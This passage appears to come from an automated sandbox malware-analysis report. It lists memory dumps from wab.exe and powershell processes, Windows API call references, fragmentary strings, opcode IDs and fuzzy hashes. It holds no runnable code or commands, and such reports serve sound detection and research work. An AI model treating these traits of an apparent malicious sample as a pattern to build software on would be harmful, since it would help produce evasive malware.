                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: lstrlen$lstrcat
                                                • String ID:
                                                • API String ID: 493641738-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _free.LIBCMT ref: 222E91D0
                                                  • Part of subcall function 222E571E: HeapFree.KERNEL32(00000000,00000000,?,222E924F,?,00000000,?,00000000,?,222E9276,?,00000007,?,?,222E7E5A,?), ref: 222E5734
                                                  • Part of subcall function 222E571E: GetLastError.KERNEL32(?,?,222E924F,?,00000000,?,00000000,?,222E9276,?,00000007,?,?,222E7E5A,?,?), ref: 222E5746
                                                • _free.LIBCMT ref: 222E91E2
                                                • _free.LIBCMT ref: 222E91F4
                                                • _free.LIBCMT ref: 222E9206
                                                • _free.LIBCMT ref: 222E9218
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _free.LIBCMT ref: 222E536F
                                                  • Part of subcall function 222E571E: HeapFree.KERNEL32(00000000,00000000,?,222E924F,?,00000000,?,00000000,?,222E9276,?,00000007,?,?,222E7E5A,?), ref: 222E5734
                                                  • Part of subcall function 222E571E: GetLastError.KERNEL32(?,?,222E924F,?,00000000,?,00000000,?,222E9276,?,00000007,?,?,222E7E5A,?,?), ref: 222E5746
                                                • _free.LIBCMT ref: 222E5381
                                                • _free.LIBCMT ref: 222E5394
                                                • _free.LIBCMT ref: 222E53A5
                                                • _free.LIBCMT ref: 222E53B6
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 222E4C1D
                                                • _free.LIBCMT ref: 222E4CE8
                                                • _free.LIBCMT ref: 222E4CF2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: _free$FileModuleName
                                                • String ID: C:\Program Files (x86)\windows mail\wab.exe
                                                • API String ID: 2506810119-3377118234
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,222E6FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 222E8731
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 222E87BA
                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 222E87CC
                                                • __freea.LIBCMT ref: 222E87D5
                                                  • Part of subcall function 222E56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 222E5702
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                • String ID:
                                                • API String ID: 2652629310-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,222E1D66,00000000,00000000,?,222E5C88,222E1D66,00000000,00000000,00000000,?,222E5E85,00000006,FlsSetValue), ref: 222E5D13
                                                • GetLastError.KERNEL32(?,222E5C88,222E1D66,00000000,00000000,00000000,?,222E5E85,00000006,FlsSetValue,222EE190,FlsSetValue,00000000,00000364,?,222E5BC8), ref: 222E5D1F
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,222E5C88,222E1D66,00000000,00000000,00000000,?,222E5E85,00000006,FlsSetValue,222EE190,FlsSetValue,00000000), ref: 222E5D2D
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _free.LIBCMT ref: 222E655C
                                                  • Part of subcall function 222E62BC: IsProcessorFeaturePresent.KERNEL32(00000017,222E62AB,00000000,?,?,?,?,00000016,?,?,222E62B8,00000000,00000000,00000000,00000000,00000000), ref: 222E62BE
                                                  • Part of subcall function 222E62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 222E62E0
                                                  • Part of subcall function 222E62BC: TerminateProcess.KERNEL32(00000000), ref: 222E62E7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                • String ID: *?$.
                                                • API String ID: 2667617558-3972193922
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: _strlen
                                                • String ID: : $Se.
                                                • API String ID: 4218353326-4089948878
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 222E2903
                                                  • Part of subcall function 222E35D2: RaiseException.KERNEL32(?,?,?,222E2925,00000000,00000000,00000000,?,?,?,?,?,222E2925,?,222F21B8), ref: 222E3632
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 222E2920
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID: Exception@8Throw$ExceptionRaise
                                                • String ID: Unknown exception
                                                • API String ID: 3476068407-410509341
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetOEMCP.KERNEL32(00000000,?,?,222E6C7C,?), ref: 222E6A1E
                                                • GetACP.KERNEL32(00000000,?,?,222E6C7C,?), ref: 222E6A35
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3327431235.00000000222E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 222E0000, based on PE: true
                                                • Associated: 00000008.00000002.3327406883.00000000222E0000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000008.00000002.3327431235.00000000222F6000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_222e0000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: |l."
                                                • API String ID: 0-2668083892
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3277424476.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_8350000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \Vkj
                                                • API String ID: 0-3821012782
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3277424476.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_8350000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$$cq$$cq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-1572487497
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8Nkj$Hgq$h]kj$h]kj$h]kj$$cq$$cq$Ikj
                                                • API String ID: 0-1331133414
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$$cq$$cq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-4227879362
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq
                                                • API String ID: 0-1446110543
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $cq$$cq$$cq$$cq
                                                • API String ID: 0-2876200767
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 84ul$tPcq
                                                • API String ID: 0-1718874687
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: h]kj$Ikj
                                                • API String ID: 0-2804767068
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $cq$$cq
                                                • API String ID: 0-2695052418
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: U
                                                • API String ID: 0-3372436214
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3277424476.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_8350000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \Vkj
                                                • API String ID: 0-3821012782
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3277424476.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_8350000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 770770be0617bfdd2a4c7dc741cb39ade4f27cb4a72b9113620c58b3a8c329b4
                                                • Instruction ID: 7736116639e387fec2ccaa6edefc4a497c4779fabae92accc2f548c513814287
                                                • Opcode Fuzzy Hash: 770770be0617bfdd2a4c7dc741cb39ade4f27cb4a72b9113620c58b3a8c329b4
                                                • Instruction Fuzzy Hash: 7741E8F1A002068FCF318F289541AEA7BB1FF99364F1584A7D8089F651DB75DD81CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bdd9604e3db9b9040dfd786a94604a94737f44af5f5a24271f6818a8b1714955
                                                • Instruction ID: 9d9671388a87ea592a9c7f231538432fb56c3ee9eaa933f23dd6f40e3b45f633
                                                • Opcode Fuzzy Hash: bdd9604e3db9b9040dfd786a94604a94737f44af5f5a24271f6818a8b1714955
                                                • Instruction Fuzzy Hash: AB417131B002059FDB14DF64C894AAD7BB6EF88754F188468E806EB3A0DF749C81DB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 329dd0f89894172bfeeb393e73a2e496adad359002a9d71e45fd7f5b1d1503cc
                                                • Instruction ID: 1c10166bc5fe8c74beaa663d4353cb8d0376bcc09adfe9862cbaa68a80edee73
                                                • Opcode Fuzzy Hash: 329dd0f89894172bfeeb393e73a2e496adad359002a9d71e45fd7f5b1d1503cc
                                                • Instruction Fuzzy Hash: F54128B4A006059FCB45CF59C494DAEFBB1FF88310B15869AD815AB365C736FD90CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 013021ceeecb9ec3b765a6b049e51ea78c84ad60a66417d7ab1c5d2236fcffb4
                                                • Instruction ID: b1d04b7923fdcd124f5edfea53c807c5f53beafe30c38c84321c76e9954bf7c1
                                                • Opcode Fuzzy Hash: 013021ceeecb9ec3b765a6b049e51ea78c84ad60a66417d7ab1c5d2236fcffb4
                                                • Instruction Fuzzy Hash: 2A317C30B01118EFCF15DBA8D580AADB7F6AF89354F248569E402AB350DF30AD4ADB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8ef52a6736359c08ec40a1dc4436146099cdc9ccfafa0a0cdb69d56d098c5216
                                                • Instruction ID: f5fcc9acac92e84afe10de6dac86342861604d469bf81b1f3e7d1af832c94de4
                                                • Opcode Fuzzy Hash: 8ef52a6736359c08ec40a1dc4436146099cdc9ccfafa0a0cdb69d56d098c5216
                                                • Instruction Fuzzy Hash: 6C312D3590E3D04FCB138B719C64A517FB19F83254B1A80EBD488DF6A3D62D9D0ADB22
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 21b7eb1d7603c74d8f2da31d2ba33e1fc74476191edf50a35b11c63cb85f8bed
                                                • Instruction ID: 76d2fda2ced98e47e31b9b0bdf13b3431a6a30ae82ba779e1cc6a2f5453e6e80
                                                • Opcode Fuzzy Hash: 21b7eb1d7603c74d8f2da31d2ba33e1fc74476191edf50a35b11c63cb85f8bed
                                                • Instruction Fuzzy Hash: 84316371B006049FDB14DF69D898AA97BB1EF88360F18016CE506EB3A2CF719C41CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3a8f2c9a717de8f88524a78d9ac840db4771be93c54339cabd3be77e1aba3ae2
                                                • Instruction ID: 68d9096a84d5ac08d4acd8fdf8d038102eb47ae004481449bc8b464976f8efb3
                                                • Opcode Fuzzy Hash: 3a8f2c9a717de8f88524a78d9ac840db4771be93c54339cabd3be77e1aba3ae2
                                                • Instruction Fuzzy Hash: 09311774A005099FCB04CF9CC8909AEFBF1FF89310B258299D998AB751C731EC91DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3284f4bff9fe605bdc56c887eb2d5f1274d80a28a39422926c7186d01289f464
                                                • Instruction ID: 3c5b67a9f9d1f8edd1a97e3a5f1d0b21ed0e64b9d421d7a13fa53dbd6b260ca1
                                                • Opcode Fuzzy Hash: 3284f4bff9fe605bdc56c887eb2d5f1274d80a28a39422926c7186d01289f464
                                                • Instruction Fuzzy Hash: 21217F74A042499FCB01DF98D8909AEBBF1FF89310B14809AE909EB352C331ED44CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9861aaf542336bafb304a7458d2933a6591e68ab0afac5d5fe1ce7c213ca8aa0
                                                • Instruction ID: ce9aa530b897ac08f76048fb5085cc7f0272ed062eb225814267c294de78a76b
                                                • Opcode Fuzzy Hash: 9861aaf542336bafb304a7458d2933a6591e68ab0afac5d5fe1ce7c213ca8aa0
                                                • Instruction Fuzzy Hash: 54215EB4A042099FCB00DF9CC8909AEBBF1FF89310B148196D919EB352C735ED41DBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d8414895f13b9e5bf86491b8f64671b7559dc11d6c55dc1add516ff7f11fea13
                                                • Instruction ID: e37d369019701ff20cfaa0f9527ab51377715d655205c27c04fff245a38f7ad2
                                                • Opcode Fuzzy Hash: d8414895f13b9e5bf86491b8f64671b7559dc11d6c55dc1add516ff7f11fea13
                                                • Instruction Fuzzy Hash: 291196352053408FC715D768D444B55BBA9EF86364F1981EEE0088F6A3CB75D847C751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3199249639.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f7cc0f0e5ec8f4ae033328766424a31882f13b05bcc1180a8da6d4e60b56685e
                                                • Instruction ID: 6a4f7707a5261a5f59f9504d35819576928b34b8739b1e0a8c23ef6b3f772db0
                                                • Opcode Fuzzy Hash: f7cc0f0e5ec8f4ae033328766424a31882f13b05bcc1180a8da6d4e60b56685e
                                                • Instruction Fuzzy Hash: C221E7B4A00509DFCB04CF89C9809AAFBB1FF8C310B158169D919A7351C735ED51DBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3270091179.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_7570000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f1703f2b6317d5bad946cff9b20e03fd13087ac98a4cf8723afa09b27b64869e
                                                • Instruction ID: 34fe0596a768258100dcbc574698cdd98df2afcaba3f5aa02c1f9f6f98fa5f9f
                                                • Opcode Fuzzy Hash: f1703f2b6317d5bad946cff9b20e03fd13087ac98a4cf8723afa09b27b64869e
                                                • Instruction Fuzzy Hash: 121100B0649784AFD3128B24DC15B917FA5EF46710F08C4C7E6449F2C3CA75AC86C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.3196093327.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dbd000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
